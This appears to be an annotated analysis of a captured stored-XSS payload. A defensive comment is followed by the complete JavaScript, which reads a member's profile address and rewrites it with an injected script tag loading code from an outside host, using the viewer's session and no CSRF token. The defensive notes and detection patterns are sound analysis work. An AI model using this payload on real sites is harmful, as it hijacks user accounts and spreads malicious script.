<!--
  Captured XSS payload page, annotated for analysis.

  What the script does, as written:
    1. GETs /member/account/basic.asp on whatever origin it runs in and pulls
       the current Address value out of the returned form markup.
    2. POSTs to /cmd/member/setBasic.asp?cmd=set, writing the Address back with
       extra markup appended that closes the value attribute and adds a
       <script src=...> element pointing at an external host.

  Both URLs are relative, so the requests are same-origin and the browser
  attaches the viewer's session cookies automatically.

  Defensive reading:
    - Root cause is the Address field being rendered into an HTML attribute
      without attribute encoding; encode on output and reject markup
      characters on input.
    - The POST body carries no per-request token, so setBasic.asp presumably
      does not require one; confirm against the server and add anti-CSRF
      validation.
    - A Content-Security-Policy that restricts script-src to the site's own
      origins would block the injected external script from loading.
    - Detection: POSTs to setBasic.asp whose Address parameter contains
      "%22%3E%3Cscript", stored Address values containing "<script", and
      client requests to the external host named in the payload string.

  Note: the script tag's attribute is misspelled ("lnaguage"); browsers ignore
  unknown attributes and treat the element as JavaScript by default.
-->
<meta charset="utf8">
<script lnaguage="javascript">
/**
 * Build an XMLHttpRequest object, falling back to the legacy ActiveX
 * implementations when window.XMLHttpRequest is not available.
 *
 * @returns {XMLHttpRequest|ActiveXObject|false} a request object, or false
 *          when none of the three constructors is usable.
 */
function createRequest(){
    var xmlHttp=false;
    if(window.XMLHttpRequest){
        xmlHttp = new XMLHttpRequest();
    }else if(window.ActiveXObject){
        // Legacy Internet Explorer path: try the newer ProgID first, then the older one.
        try{
            xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
        }catch(error1){
            try{
                xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
            }catch(error2){
                xmlHttp = false;
            }
        }
    }
    return xmlHttp;
}

// Stage 1: fetch the viewer's own profile form. Runs as soon as the script is
// parsed; updatePage is a hoisted function declaration, so it is already
// defined here even though its body appears further down.
var getAddress;
if(getAddress=createRequest()){
    getAddress.open("GET","/member/account/basic.asp");
    getAddress.onreadystatechange=updatePage;
    getAddress.send(null);
}

// Shared with attack(): holds the stage-2 (write-back) request.
var xml;

/**
 * readystatechange handler for the stage-1 GET.
 *
 * On a completed 200 response it extracts the current Address value from the
 * response markup and issues the stage-2 POST that rewrites the profile.
 * A 404 or any other status is surfaced through alert().
 */
function updatePage() {
    if(getAddress.readyState == 4 ) {
        if(getAddress.status == 200) {
            var str = getAddress.responseText;
            // Matches the Address <input> exactly as the form renders it.
            // `rex` is assigned without var/let/const, so it becomes an implicit global.
            rex = /name="Address" value="(.*)" size="38"/;
            // If the pattern does not match, ttt is null and ttt[1] below throws.
            var ttt = rex.exec(str);
            if(xml=createRequest()){
                xml.open("POST","/cmd/member/setBasic.asp?cmd=set");
                xml.onreadystatechange = attack;
                // Form body: the existing address is kept, and a URL-encoded suffix is
                // appended that decodes to a quote and ">" (ending the value attribute),
                // a <script src=...> element, and an unterminated <input type="hidden
                // that absorbs the rest of the original tag. The remaining fields
                // (LinkMan, Tel, QQ) are overwritten with filler values.
                // No anti-CSRF token field is present in this body.
                var body = "areaID=0&provinceID=1&cityID=1&Address="+encodeURI(ttt[1])+"%22%3E%3Cscript%20src%3Dhttp%3A%2F%2Fxssl.sinaapp.com%2F0S3c9D%3F1383890465%3E%3C%2Fscript%3E%3Cinput%20type%3D%22hidden&=&LinkMan=asdf&Tel=12345789&QQ=123456789&=%E4%BF%9D%E5%AD%98%E4%BF%AE%E6%94%B9&";
                xml.setRequestHeader("Content-type","application/x-www-form-urlencoded");
                xml.send(body);
            }
        }else if(getAddress.status==404){
            alert("404");
        }else {
            alert("status:"+getAddress.statusText);
        }
    }
}

/**
 * readystatechange handler for the stage-2 POST.
 *
 * Checks for a completed 200 response but takes no action on it; the
 * write-back is fire-and-forget.
 */
function attack(){
    if(xml.readyState == 4 ){
        if(xml.status == 200){
            // Intentionally empty in the captured sample.
        }
    }
}
</script>